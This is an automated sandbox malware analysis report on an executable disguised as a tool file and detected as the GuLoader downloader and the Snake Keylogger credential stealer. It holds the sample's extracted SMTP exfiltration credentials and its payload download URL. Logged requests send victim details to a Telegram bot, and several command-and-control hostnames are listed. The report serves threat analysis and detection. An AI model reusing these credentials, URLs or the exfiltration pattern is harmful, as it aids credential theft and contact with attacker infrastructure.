Windows Analysis Report
SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

Overview

General Information

Sample name:SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Analysis ID:1527845
MD5:e7ebd3de4bcba42feee0d2bd98521920
SHA1:71608b8fd542467e554766de37cdc8244c84286f
SHA256:383d758b111ebf7255078b12d04f9f0e39ea4f85733563344754cbaad4bf0581

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64native
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

{"Exfil Mode": "SMTP", "Username": "bagslog@cybertechllc.top", "Password": "7213575aceACE@@ ", "Host": "mail.cybertechllc.top", "Port": "587", "Version": "4.4"}

Source | Rule | Description | Author | Strings
00000000.00000002.1493431079.0000000000507000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000000.00000002.1493431079.0000000000515000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security
00000000.00000002.1494958612.000000000597D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe PID: 8984 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T10:56:16.470754+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49712 | 172.67.177.134 | 443 | TCP
2024-10-07T10:56:17.118729+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49713 | 172.67.177.134 | 443 | TCP
2024-10-07T10:56:17.760474+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49714 | 172.67.177.134 | 443 | TCP
2024-10-07T10:56:18.404606+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49715 | 172.67.177.134 | 443 | TCP
2024-10-07T10:56:19.047470+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49716 | 172.67.177.134 | 443 | TCP
2024-10-07T10:56:19.699159+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49717 | 172.67.177.134 | 443 | TCP
2024-10-07T10:56:20.346164+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49718 | 172.67.177.134 | 443 | TCP
2024-10-07T10:56:20.989727+0200 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49719 | 172.67.177.134 | 443 | TCP
2024-10-07T10:56:14.425508+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49710 | 132.226.247.73 | 80 | TCP
2024-10-07T10:56:16.081455+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49710 | 132.226.247.73 | 80 | TCP
2024-10-07T10:56:16.721927+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49710 | 132.226.247.73 | 80 | TCP
2024-10-07T10:56:17.378031+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49710 | 132.226.247.73 | 80 | TCP
2024-10-07T10:56:18.018459+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49710 | 132.226.247.73 | 80 | TCP
2024-10-07T10:56:18.658962+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49710 | 132.226.247.73 | 80 | TCP
2024-10-07T10:56:19.315074+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49710 | 132.226.247.73 | 80 | TCP
2024-10-07T10:56:19.955526+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49710 | 132.226.247.73 | 80 | TCP
2024-10-07T10:56:20.596114+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49710 | 132.226.247.73 | 80 | TCP
2024-10-07T10:56:09.869120+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49708 | 142.250.80.46 | 443 | TCP

AV Detection

Source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "bagslog@cybertechllc.top", "Password": "7213575aceACE@@ ", "Host": "mail.cybertechllc.top", "Port": "587", "Version": "4.4"}
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, ReversingLabs: Detection: 55%

Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, Code function: 11_2_385DC9A8 CryptUnprotectData,11_2_385DC9A8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, Code function: 11_2_385DD078 CryptUnprotectData,11_2_385DD078
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49711 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:49708 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49709 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49720 version: TLS 1.2
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Windows.Forms.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000717DB000.00000020.00000001.01000000.0000000C.sdmp
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, Code function: 0_2_00406001 FindFirstFileA,FindClose,0_2_00406001
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, Code function: 0_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559F
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, Code function: 0_2_00402688 FindFirstFileA,0_2_00402688
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, Code function: 11_2_00406001 FindFirstFileA,FindClose,11_2_00406001
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, Code function: 11_2_00402688 FindFirstFileA,11_2_00402688
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, Code function: 11_2_0040559F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,11_2_0040559F

Networking

Source: unknown, DNS query: name: api.telegram.org
Source: global traffic, HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 172.67.177.134
Source: Joe Sandbox View, IP Address: 132.226.247.73
Source: Joe Sandbox View, ASN Name: TELEGRAMRU
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown, DNS query: name: checkip.dyndns.org
Source: unknown, DNS query: name: reallyfreegeoip.org
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49710 -> 132.226.247.73:80
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49712 -> 172.67.177.134:443
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49708 -> 142.250.80.46:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49714 -> 172.67.177.134:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49715 -> 172.67.177.134:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49719 -> 172.67.177.134:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49717 -> 172.67.177.134:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49716 -> 172.67.177.134:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49718 -> 172.67.177.134:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49713 -> 172.67.177.134:443
Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
            Source: unknown - HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49711 version: TLS 1.0
            Source: unknown - UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic - HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic - HTTP traffic detected: GET /xml/191.96.150.187 HTTP/1.1 Host: reallyfreegeoip.org
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036489000.00000004.00000800.00020000.00000000.sdmp - String found in binary or memory: Microsoft Edge user-data JSON (web_notification_override, os_crypt encrypted_key, profile info_cache)
            Source: global traffic - DNS traffic detected: DNS query: drive.google.com
            Source: global traffic - DNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global traffic - DNS traffic detected: DNS query: checkip.dyndns.org
            Source: global traffic - DNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global traffic - DNS traffic detected: DNS query: api.telegram.org
            Source: global traffic - HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 07 Oct 2024 08:56:21 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000710C1000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000000.1371592231.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000000.858359986.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000000.1371592231.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20a
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000362ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBZr
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5958598913.0000000007750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/X
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=download
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WV9EOTTQfkUmPf_sEzMxkIUTbO_SPJgS&export=downloadtz
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eicar.org/
